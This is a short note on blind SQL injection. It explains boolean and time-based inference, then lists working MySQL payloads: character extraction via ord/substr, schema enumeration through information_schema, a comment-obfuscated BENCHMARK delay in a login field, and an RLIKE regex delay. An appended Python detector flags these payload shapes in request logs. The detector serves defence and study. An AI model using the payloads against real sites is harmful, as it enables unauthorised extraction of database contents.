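0x01[Vulnerability Principle]

  • When union-based and error-based injection cannot be used against a page, the injection is judged by whether the response is displayed normally, or by using functions that cause a delay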

0x02[Payload]

id=1^(ord(substr((select(group_concat(xxx))from(xxx)),{},1))={})

id=1^(ord(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema=database())),1,1))>1)

id=1^(ord(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name='xxx')),{},1))>1)

username=admin&password=or/**/if(mid(group_concat(mid((Select/**/group_concat(a)/**/from(Select/**/1/**/as/**/a/**/union/**/Select*from/**/users)n),1,1)),1,1)/**/like/**/'a',(Select/**/Benchmark(100000000,md5(5)),1))#

(Select/**/Benchmark(100000000,md5(5)),1)

select rpad('a',4999999,'a') RLIKE concat(repeat('(a.*)+',30),'b');
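
Added example (not part of the original note): a Python check for request logs that recognises the payload shapes listed above after URL-decoding and `/**/` comment stripping, and flags clients that send repeated probes, since this kind of extraction needs many requests. The log layout, sample lines, IP addresses, threshold and the names `normalize`, `classify` and `flag_clients` are assumptions made for illustration.

```python
import re
from collections import Counter
from urllib.parse import unquote_plus

# Signatures for the payload shapes listed in this note (matched after normalization).
SIGNATURES = {
    "char-compare": re.compile(r"\b(ord|ascii)\s*\(\s*(substr|substring|mid)\s*\("),
    "schema-enum": re.compile(r"\binformation_schema\s*\.\s*(tables|columns)\b"),
    "time-delay": re.compile(r"\b(benchmark|sleep)\s*\("),
    "regex-delay": re.compile(r"\b(rlike|regexp)\b.*\brepeat\s*\("),
    "if-probe": re.compile(r"\bif\s*\(\s*(mid|substr|substring|ord|ascii)\s*\("),
}
COMMENT = re.compile(r"/\*.*?\*/", re.S)

def normalize(raw):
    """Undo URL-encoding (up to twice) and turn /**/ comments into spaces."""
    text = raw
    for _ in range(2):
        text = unquote_plus(text)
    text = COMMENT.sub(" ", text)
    return re.sub(r"\s+", " ", text).lower()

def classify(raw):
    """Return the sorted names of all signatures found in one parameter string."""
    text = normalize(raw)
    return sorted(name for name, rx in SIGNATURES.items() if rx.search(text))

def flag_clients(lines, threshold=3):
    """Count signature hits per client; return clients with >= threshold hits."""
    hits = Counter()
    for line in lines:
        client, params = line.split(" ", 1)
        if classify(params):
            hits[client] += 1
    return {c: n for c, n in hits.items() if n >= threshold}

# Constructed sample, one "<client-ip> <raw parameter string>" per line.
PROBE = "id=1%5E(ord(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema=database())),{},1))%3E{})"
SAMPLE_LOG = [
    "198.51.100.4 id=1",
    "203.0.113.7 " + PROBE.format(1, 64),
    "203.0.113.7 " + PROBE.format(1, 96),
    "203.0.113.7 " + PROBE.format(2, 64),
    "198.51.100.9 password=(Select/**/Benchmark(100000000,md5(5)),1)%23",
    "198.51.100.4 q=how+to+repeat+an+order",
]

if __name__ == "__main__":
    print(flag_clients(SAMPLE_LOG))
```

A single hit from `classify` is already worth an alert; `flag_clients` separates sustained character-by-character extraction from one-off probes.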